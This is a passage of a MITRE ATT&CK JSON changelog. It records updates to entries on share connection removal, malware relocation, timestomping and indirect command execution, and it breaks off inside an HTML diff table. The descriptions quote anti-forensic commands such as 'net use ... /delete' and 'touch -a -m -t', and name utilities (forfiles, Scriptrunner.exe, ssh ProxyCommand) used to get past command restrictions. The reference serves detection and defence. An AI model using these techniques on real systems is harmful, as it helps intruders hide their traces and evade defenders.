                    "description": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\\\system\\share /delete</code> command. (Citation: Technet Net Use)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1070/005",
                            "external_id": "T1070.005"
                        },
                        {
                            "source_name": "Technet Net Use",
                            "description": "Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.",
                            "url": "https://technet.microsoft.com/bb490717.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:29:50.512000+00:00\", \"old_value\": \"2025-10-24 17:49:11.691000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0103: Behavioral Detection of Network Share Connection Removal via CLI and SMB Disconnects"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-05-31 11:07:57.406000+00:00",
                    "modified": "2026-04-15 20:29:55.911000+00:00",
                    "name": "Relocate Malware",
                    "description": "Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.\n\nRelocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Resource Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)\n\nRelocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders. Moving payloads into target directories does not alter the Creation timestamp, thereby evading detection logic reliant on modifications to this artifact (i.e., [Timestomp](https://attack.mitre.org/techniques/T1070/006)).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1070/010",
                            "external_id": "T1070.010"
                        },
                        {
                            "source_name": "Latrodectus APR 2024",
                            "description": "Proofpoint Threat Research and Team Cymru S2 Threat Research. (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May 31, 2024.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice"
                        },
                        {
                            "source_name": "DFIR Report Trickbot June 2023",
                            "description": "The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out. Retrieved May 31, 2024.",
                            "url": "https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Gregory Frey",
                        "Matt Anderson, @\u200cnosecurething, Huntress"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:29:55.911000+00:00\", \"old_value\": \"2025-10-05 16:08:40.119000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0439: Detection of Malware Relocation via Suspicious File Movement"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-31 12:42:44.103000+00:00",
                    "modified": "2026-04-15 20:30:57.770000+00:00",
                    "name": "Timestomp",
                    "description": "Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.\n\nIn Windows systems, both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)\n\nModifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)\n\nAdversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in \u201cdouble timestomping\u201d by modifying times on both attributes simultaneously.(Citation: Double Timestomping)\n\nIn Linux systems and on ESXi servers, threat actors may attempt to perform timestomping using commands such as `touch -a -m -t <timestamp> <filename>` (which sets access and modification times to a specific value) or `touch -r <filename> <filename>` (which sets access and modification times to match those of another file).(Citation: Inversecos Linux Timestomping)(Citation: Juniper Networks ESXi Backdoor 2022)\n\nTimestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1070/006",
                            "external_id": "T1070.006"
                        },
                        {
                            "source_name": "Juniper Networks ESXi Backdoor 2022",
                            "description": "Asher Langton. (2022, December 9). A Custom Python Backdoor for VMWare ESXi Servers. Retrieved March 26, 2025.",
                            "url": "https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers"
                        },
                        {
                            "source_name": "WindowsIR Anti-Forensic Techniques",
                            "description": "Carvey, H. (2013, July 23). HowTo: Determine/Detect the use of Anti-Forensics Techniques. Retrieved June 3, 2016.",
                            "url": "http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html"
                        },
                        {
                            "source_name": "Inversecos Linux Timestomping",
                            "description": "inversecos. (2022, August 4). Detecting Linux Anti-Forensics: Timestomping. Retrieved March 26, 2025.",
                            "url": "https://www.inversecos.com/2022/08/detecting-linux-anti-forensics.html"
                        },
                        {
                            "source_name": "Inversecos Timestomping 2022",
                            "description": "Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping Detection \u2013 NTFS Forensics. Retrieved September 30, 2024.",
                            "url": "https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html"
                        },
                        {
                            "source_name": "Magnet Forensics",
                            "description": "Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.",
                            "url": "https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/"
                        },
                        {
                            "source_name": "Double Timestomping",
                            "description": "Matthew Dunwoody. (2022, April 28). I have seen double-timestomping ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.",
                            "url": "https://x.com/matthewdunwoody/status/1519846657646604289"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Mike Hartley @mikehartley10",
                        "Romain Dumont, ESET"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:30:57.770000+00:00\", \"old_value\": \"2025-10-24 17:48:43.937000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0591: Cross-Platform Behavioral Detection of File Timestomping via Metadata Tampering"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-04-18 17:59:24.739000+00:00",
                    "modified": "2026-04-15 20:31:14.152000+00:00",
                    "name": "Indirect Command Execution",
                    "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (`pcalua.exe`), components of the Windows Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe) Adversaries may also abuse the `ssh.exe` binary to execute malicious commands via the `ProxyCommand` and `LocalCommand` options, which can be invoked via the `-o` flag or by modifying the SSH config file.(Citation: Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot)\n\nAdversaries may abuse these features for [Stealth](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1202",
                            "external_id": "T1202"
                        },
                        {
                            "source_name": "Bleeping Computer - Scriptrunner.exe",
                            "description": "Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting tool to deploy malware. Retrieved July 8, 2024.",
                            "url": "https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/"
                        },
                        {
                            "source_name": "Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot",
                            "description": "Cyble. (2024, December 5). Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot. Retrieved February 4, 2025.",
                            "url": "https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/"
                        },
                        {
                            "source_name": "Evi1cg Forfiles Nov 2017",
                            "description": "Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved September 12, 2024.",
                            "url": "https://x.com/Evi1cg/status/935027922397573120"
                        },
                        {
                            "source_name": "Secure Team - Scriptrunner.exe",
                            "description": "Secure Team - Information Assurance. (2023, January 8). Windows Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.",
                            "url": "https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/"
                        },
                        {
                            "source_name": "SS64",
                            "description": "SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.",
                            "url": "https://ss64.com/nt/scriptrunner.html"
                        },
                        {
                            "source_name": "VectorSec ForFiles Aug 2017",
                            "description": "vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved September 12, 2024.",
                            "url": "https://x.com/vector_sec/status/896049052642533376"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Liran Ravich, CardinalOps",
                        "Matthew Demaske, Adaptforward"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:31:14.152000+00:00\", \"old_value\": \"2025-10-24 17:48:40.495000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (`pcalua.exe`), components of the Windows Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe) Adversaries may also abuse the `ssh.exe` binary to execute malicious commands via the `ProxyCommand` and `LocalCommand` options, which can be invoked via the `-o` flag or by modifying the SSH config file.(Citation: Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot)\\n\\nAdversaries may abuse these features for [Stealth](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.\", \"old_value\": \"Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (`pcalua.exe`), components of the Windows Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe) Adversaries may also abuse the `ssh.exe` binary to execute malicious commands via the `ProxyCommand` and `LocalCommand` options, which can be invoked via the `-o` flag or by modifying the SSH config file.(Citation: Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot)\\n\\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (`pcalua.exe`), components of the Windows Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe) Adversaries may also abuse the `ssh.exe` binary to execute malicious commands via the `ProxyCommand` and `LocalCommand` options, which can be invoked via the `-o` flag or by modifying the SSH config file.(Citation: Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot)\\n \\n-Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.\\n+Adversaries may abuse these features for [Stealth](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}, \"iterable_item_removed\": {\"root['external_references'][4]\": {\"source_name\": \"RSA Forfiles Aug 2017\", \"description\": \"Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018.\", \"url\": \"https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to12__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to12__0\"><a href=\"#difflib_chg_to12__top\">t</a></td><td class=\"diff_header\" id=\"from12_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;abuse&nbsp;utilities&nbsp;that&nbsp;allow&nbsp;for&nbsp;command&nbsp;execu</td><td class=\"diff_next\"><a href=\"#difflib_chg_to12__top\">t</a></td><td class=\"diff_header\" id=\"to12_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;abuse&nbsp;utilities&nbsp;that&nbsp;allow&nbsp;for&nbsp;command&nbsp;execu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion&nbsp;to&nbsp;bypass&nbsp;security&nbsp;restrictions&nbsp;that&nbsp;limit&nbsp;the&nbsp;use&nbsp;of&nbsp;c</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion&nbsp;to&nbsp;bypass&nbsp;security&nbsp;restrictions&nbsp;that&nbsp;limit&nbsp;the&nbsp;use&nbsp;of&nbsp;c</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ommand-line&nbsp;interpreters.&nbsp;Various&nbsp;Windows&nbsp;utilities&nbsp;may&nbsp;be&nbsp;u</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ommand-line&nbsp;interpreters.&nbsp;Various&nbsp;Windows&nbsp;utilities&nbsp;may&nbsp;be&nbsp;u</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sed&nbsp;to&nbsp;execute&nbsp;commands,&nbsp;possibly&nbsp;without&nbsp;invoking&nbsp;[cmd](htt</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sed&nbsp;to&nbsp;execute&nbsp;commands,&nbsp;possibly&nbsp;without&nbsp;invoking&nbsp;[cmd](htt</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ps://attack.mitre.org/software/S0106).&nbsp;For&nbsp;example,&nbsp;[Forfile</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ps://attack.mitre.org/software/S0106).&nbsp;For&nbsp;example,&nbsp;[Forfile</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s](https://attack.mitre.org/software/S0193),&nbsp;the&nbsp;Program&nbsp;Com</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s](https://attack.mitre.org/software/S0193),&nbsp;the&nbsp;Program&nbsp;Com</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">patibility&nbsp;Assistant&nbsp;(`pcalua.exe`),&nbsp;components&nbsp;of&nbsp;the&nbsp;Windo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">patibility&nbsp;Assistant&nbsp;(`pcalua.exe`),&nbsp;components&nbsp;of&nbsp;the&nbsp;Windo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ws&nbsp;Subsystem&nbsp;for&nbsp;Linux&nbsp;(WSL),&nbsp;`Scriptrunner.exe`,&nbsp;as&nbsp;well&nbsp;as</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ws&nbsp;Subsystem&nbsp;for&nbsp;Linux&nbsp;(WSL),&nbsp;`Scriptrunner.exe`,&nbsp;as&nbsp;well&nbsp;as</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;other&nbsp;utilities&nbsp;may&nbsp;invoke&nbsp;the&nbsp;execution&nbsp;of&nbsp;programs&nbsp;and&nbsp;co</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;other&nbsp;utilities&nbsp;may&nbsp;invoke&nbsp;the&nbsp;execution&nbsp;of&nbsp;programs&nbsp;and&nbsp;co</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mmands&nbsp;from&nbsp;a&nbsp;[Command&nbsp;and&nbsp;Scripting&nbsp;Interpreter](https://at</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mmands&nbsp;from&nbsp;a&nbsp;[Command&nbsp;and&nbsp;Scripting&nbsp;Interpreter](https://at</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tack.mitre.org/techniques/T1059),&nbsp;Run&nbsp;window,&nbsp;or&nbsp;via&nbsp;scripts</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tack.mitre.org/techniques/T1059),&nbsp;Run&nbsp;window,&nbsp;or&nbsp;via&nbsp;scripts</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.(Citation:&nbsp;VectorSec&nbsp;ForFiles&nbsp;Aug&nbsp;2017)(Citation:&nbsp;Evi1cg&nbsp;Fo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.(Citation:&nbsp;VectorSec&nbsp;ForFiles&nbsp;Aug&nbsp;2017)(Citation:&nbsp;Evi1cg&nbsp;Fo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rfiles&nbsp;Nov&nbsp;2017)(Citation:&nbsp;Secure&nbsp;Team&nbsp;-&nbsp;Scriptrunner.exe)(C</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rfiles&nbsp;Nov&nbsp;2017)(Citation:&nbsp;Secure&nbsp;Team&nbsp;-&nbsp;Scriptrunner.exe)(C</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itation:&nbsp;SS64)(Citation:&nbsp;Bleeping&nbsp;Computer&nbsp;-&nbsp;Scriptrunner.ex</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itation:&nbsp;SS64)(Citation:&nbsp;Bleeping&nbsp;Computer&nbsp;-&nbsp;Scriptrunner.ex</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e)&nbsp;Adversaries&nbsp;may&nbsp;also&nbsp;abuse&nbsp;the&nbsp;`ssh.exe`&nbsp;binary&nbsp;to&nbsp;execut</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e)&nbsp;Adversaries&nbsp;may&nbsp;also&nbsp;abuse&nbsp;the&nbsp;`ssh.exe`&nbsp;binary&nbsp;to&nbsp;execut</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;malicious&nbsp;commands&nbsp;via&nbsp;the&nbsp;`ProxyCommand`&nbsp;and&nbsp;`LocalComman</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;malicious&nbsp;commands&nbsp;via&nbsp;the&nbsp;`ProxyCommand`&nbsp;and&nbsp;`LocalComman</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d`&nbsp;options,&nbsp;which&nbsp;can&nbsp;be&nbsp;invoked&nbsp;via&nbsp;the&nbsp;`-o`&nbsp;flag&nbsp;or&nbsp;by&nbsp;mod</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d`&nbsp;options,&nbsp;which&nbsp;can&nbsp;be&nbsp;invoked&nbsp;via&nbsp;the&nbsp;`-o`&nbsp;flag&nbsp;or&nbsp;by&nbsp;mod</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ifying&nbsp;the&nbsp;SSH&nbsp;config&nbsp;file.(Citation:&nbsp;Threat&nbsp;Actor&nbsp;Targets&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ifying&nbsp;the&nbsp;SSH&nbsp;config&nbsp;file.(Citation:&nbsp;Threat&nbsp;Actor&nbsp;Targets&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;Manufacturing&nbsp;industry&nbsp;with&nbsp;Lumma&nbsp;Stealer&nbsp;and&nbsp;Amadey&nbsp;Bot)</td><td class=\"diff_next\"></td><td 